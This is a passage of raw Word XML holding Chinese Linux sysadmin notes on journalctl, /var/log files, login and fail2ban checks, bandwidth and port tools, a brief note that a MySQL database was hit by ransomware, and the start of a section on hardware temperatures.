      </w:pPr>
      <w:r w:rsidRPr="00C3795E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>看上次启动后的日志信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A05EC91" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40512D09" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>journalctl -u &lt;unit_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053996DD" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的日志，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unit_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为具体的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果想合并显示多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-u &lt;unit_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5D5D54" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00751987">
        <w:t>journalctl -u nginx.service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D2061A" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRPr="00C21CCC" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01410232" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>journalctl --since=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2020-08-31 10:00:00</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2020</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>点以后的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FDD71C" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00056D66">
        <w:t>journalctl --since=yesterday --until=today</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663227AF" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00102B54">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>journalctl --since today/yesterday #</w:t>
      </w:r>
      <w:r w:rsidRPr="00102B54">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示今天</w:t>
      </w:r>
      <w:r w:rsidRPr="00102B54">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00102B54">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>昨天以来的日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D295A10" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2670EA76" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>journalctl _PID=28655</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DF71C1" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取指定进程的日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1BDE7E" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17335866" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="00340E54">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>var/log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D3059E" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="658B3997" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统启动后的信息和错误日志，是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Red Hat Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中最常用的日志之一</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292D42BA" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/secure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与安全相关的日志信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4865B07D" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/maillog </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与邮件相关的日志信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003079DD" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与定时任务相关的日志信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBFCD94" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/spooler </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UUCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>news</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设备相关的日志信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3E8CBE" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/boot.log </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>守护进程启动和停止相关的日志消息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAA456B" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/wtmp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该日志文件永久记录每个用户登录、注销及系统的启动、停机的事件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2835DF08" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79230672" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRPr="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C9407F0" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D98E5B0" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="154D76D6" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19211A52" w14:textId="06935772" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="00340E54">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查用户登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FB85AC" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>last</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D43CEB5" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>lastlog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5DCA92" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>who</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4231348E" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74BA0C9D" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>fail2ban-client status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2082EBDB" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>fail2ban-client status ssh-iptables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A80D2DF" w14:textId="19B63DCB" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>vim fail2ban.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B26BA62" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C023547" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="00340E54">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看带宽</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C927BA" w14:textId="33382578" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5136287F" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B153E0D" w14:textId="28817EF4" w:rsidR="00361A62" w:rsidRDefault="00361A62" w:rsidP="00361A62">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>检查进程、端口的网络占用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7011EB" w14:textId="77777777" w:rsidR="00361A62" w:rsidRDefault="00361A62" w:rsidP="00361A62"/>
    <w:p w14:paraId="577C7EC0" w14:textId="4569449E" w:rsidR="00361A62" w:rsidRPr="00361A62" w:rsidRDefault="00361A62" w:rsidP="00361A62">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lsof -i :&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615048C2" w14:textId="77777777" w:rsidR="00361A62" w:rsidRDefault="00361A62" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1863CF67" w14:textId="77777777" w:rsidR="00361A62" w:rsidRDefault="00361A62" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="488AE9DF" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="330D6329" w14:textId="03E81637" w:rsidR="008941B7" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事故实例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EE6764" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3"/>
    <w:p w14:paraId="415CB34C" w14:textId="77777777" w:rsidR="0002525A" w:rsidRDefault="0002525A" w:rsidP="0002525A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被勒索</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C574247" w14:textId="77777777" w:rsidR="0002525A" w:rsidRDefault="0002525A" w:rsidP="0002525A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日，我和其他前端同事合作开发的考试系统，数据库被黑宕机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A966533" w14:textId="77777777" w:rsidR="0002525A" w:rsidRDefault="0002525A" w:rsidP="0002525A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001B5DC5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="007F53F8" wp14:editId="2FC50FE3">
            <wp:extent cx="5274310" cy="2717165"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="912225826" name="图片 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50470" name="图片 1" descr="电脑萤幕的截图&#10;&#10;描述已自动生成"/>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717165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B53356" w14:textId="77777777" w:rsidR="0002525A" w:rsidRDefault="0002525A" w:rsidP="0002525A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245CFAA9" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12D14C16" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F94B2AD" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="091F11E7" w14:textId="42ACA029" w:rsidR="00F306C0" w:rsidRDefault="00792AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="165" w:name="_Toc159779626"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>硬件维护</w:t>
      </w:r>
      <w:bookmarkEnd w:id="165"/>
    </w:p>
    <w:p w14:paraId="6D1C9319" w14:textId="77777777" w:rsidR="007A6C46" w:rsidRDefault="007A6C46" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="244F0017" w14:textId="389F4C41" w:rsidR="00164D91" w:rsidRDefault="00164D91" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="166" w:name="_Toc159779627"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、进风口和出风口温度</w:t>
      </w:r>
      <w:bookmarkEnd w:id="166"/>
    </w:p>
    <w:p w14:paraId="2AD70AD2" w14:textId="77777777" w:rsidR="00164D91" w:rsidRDefault="00164D91" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D2F973" w14:textId="241B6076" w:rsidR="00164D91" w:rsidRDefault="00FE424D" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>先说一下，进风口和出风口本质上是空气温度，使用进风口和出风口</w:t>
      </w:r>
      <w:r w:rsidR="00331F6C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来判断服务器发热程度不太合理，会低于</w:t>
      </w:r>
      <w:r w:rsidR="00331F6C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidR="00331F6C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00331F6C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GPU</w:t>
      </w:r>
      <w:r w:rsidR="00331F6C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的温度大概</w:t>
      </w:r>
      <w:r w:rsidR="00331F6C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00331F6C">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00331F6C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>摄氏度左右。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211FCDBB" w14:textId="77777777" w:rsidR="00164D91" w:rsidRDefault="00164D91" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75A5C12E" w14:textId="0A007EB7" w:rsidR="00164D91" w:rsidRDefault="00B0792B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先决条件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FA1323" w14:textId="77777777" w:rsidR="00164D91" w:rsidRDefault="00164D91" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
